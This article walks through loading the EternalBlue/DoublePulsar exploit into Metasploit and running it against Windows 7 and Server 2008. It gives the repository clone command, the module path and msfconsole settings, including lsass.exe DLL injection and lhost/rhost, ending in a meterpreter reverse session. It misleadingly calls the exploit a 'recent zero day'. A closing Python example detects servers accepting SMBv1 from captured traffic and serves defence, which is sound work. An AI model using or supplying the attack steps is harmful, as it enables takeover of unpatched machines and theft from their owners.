In this article we share a recent zero day exploit that requires the Metasploit framework to target another Windows-based system. This exploit is a combination of two tools: “Eternal Blue”, which is used for backdooring Windows, and “Doublepulsar”, which is used for injecting a DLL file with the help of a payload. We will manually add this exploit to the Metasploit framework and set up to attack Windows Server 2008.
Attacker: Kali Linux
Target: Windows 7 and Windows Server 2008
Let’s Start!
Open the terminal in Kali Linux and type the following command to download this exploit from GitHub.
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Once the required exploit has been downloaded, open the folder and copy the eternalblue_doublepulsar.rb Ruby file so that we can add this exploit to Metasploit.
Now paste the copied Ruby file into the path /usr/share/metasploit-framework/modules/exploits/windows/smb, which will add this exploit to the Metasploit framework.
Then start the Metasploit framework by typing the following command, to test the zero day exploit:
msfconsole
This module exploits a vulnerability in the SMBv1 and SMBv2 protocols through Eternalblue. After that, Doublepulsar is used to remotely inject a malicious DLL.
use windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set eternalbluepath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit(eternalblue_doublepulsar) > set doublepulsarpath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x64
msf exploit(eternalblue_doublepulsar) > set processinject lsass.exe
msf exploit(eternalblue_doublepulsar) > set lhost 192.168.1.6
msf exploit(eternalblue_doublepulsar) > set rhost 192.168.1.104
msf exploit(eternalblue_doublepulsar) > exploit
As you can observe from the screenshot, we only need to set the target’s architecture and IP before launching the exploit. Once all the information is set, launch the attack, which will give you a meterpreter session, as it did for me.
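The module description above names SMBv1 as an affected protocol, so a defender reviewing a network wants to know which servers still agree to speak it. The following is an added example, not part of the original article: it parses captured TCP/445 payloads and lists the servers whose negotiate response selected an SMB1 dialect. The function names, the sample frames and the 192.0.2.x addresses are constructed for illustration.

```python
import struct

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
COM_NEGOTIATE, FLAG_REPLY = 0x72, 0x80  # SMB1 negotiate command; reply bit in Flags

def parse_smb(frame: bytes) -> dict:
    """Parse one TCP/445 payload: 4-byte NetBIOS session header + SMB message."""
    out = {"family": "other", "kind": None, "dialects": [], "selected": None}
    if len(frame) < 8 or frame[0] != 0x00:  # not a NetBIOS session message
        return out
    msg = frame[4:4 + int.from_bytes(frame[1:4], "big")]
    if msg[:4] != SMB1_MAGIC or len(msg) < 35:  # need 32-byte header + 3 bytes
        out["family"] = "smb2+" if msg[:4] == SMB2_MAGIC else "other"
        return out
    out["family"] = "smb1"
    if msg[4] != COM_NEGOTIATE:
        return out
    word_count = msg[32]
    if msg[9] & FLAG_REPLY:  # server answer: first parameter word is DialectIndex
        out["kind"] = "negotiate-response"
        index = struct.unpack_from("<H", msg, 33)[0] if word_count else 0xFFFF
        out["selected"] = None if index == 0xFFFF else index  # 0xFFFF: none accepted
        return out
    out["kind"] = "negotiate-request"
    pos = 33 + 2 * word_count  # ByteCount follows the parameter words
    if pos + 2 <= len(msg):
        (byte_count,) = struct.unpack_from("<H", msg, pos)
        data = msg[pos + 2:pos + 2 + byte_count]  # entries: 0x02 + NUL-terminated name
        out["dialects"] = [d[1:].decode("ascii", "replace")
                           for d in data.split(b"\x00") if d[:1] == b"\x02"]
    return out

def servers_accepting_smb1(records):  # records: (source_ip, payload) pairs
    parsed = [(ip, parse_smb(payload)) for ip, payload in records]
    return sorted({ip for ip, p in parsed
                   if p["kind"] == "negotiate-response" and p["selected"] is not None})

def _frame(msg):  # prepend the 4-byte NetBIOS session header
    return b"\x00" + len(msg).to_bytes(3, "big") + msg
def _smb1(flags, params, data):  # build a constructed SMB1 negotiate message
    hdr = SMB1_MAGIC + bytes([COM_NEGOTIATE]) + bytes(4) + bytes([flags]) + bytes(22)
    return _frame(hdr + bytes([len(params) // 2]) + params + struct.pack("<H", len(data)) + data)

SAMPLE = [  # constructed traffic, documentation-range addresses
    ("192.0.2.5", _smb1(0x00, b"", b"\x02NT LM 0.12\x00\x02SMB 2.002\x00")),  # client offer
    ("192.0.2.20", _smb1(0x80, struct.pack("<H", 0) + bytes(32), b"")),  # server picks SMB1
    ("192.0.2.21", _smb1(0x80, struct.pack("<H", 0xFFFF), b"")),  # server refuses
    ("192.0.2.22", _frame(SMB2_MAGIC + bytes(60))),  # SMB2 or later message
]
```

Calling servers_accepting_smb1(SAMPLE) returns only 192.0.2.20, the one constructed server that selected an SMB1 dialect; hosts on such a list are the candidates for disabling SMBv1 and patching.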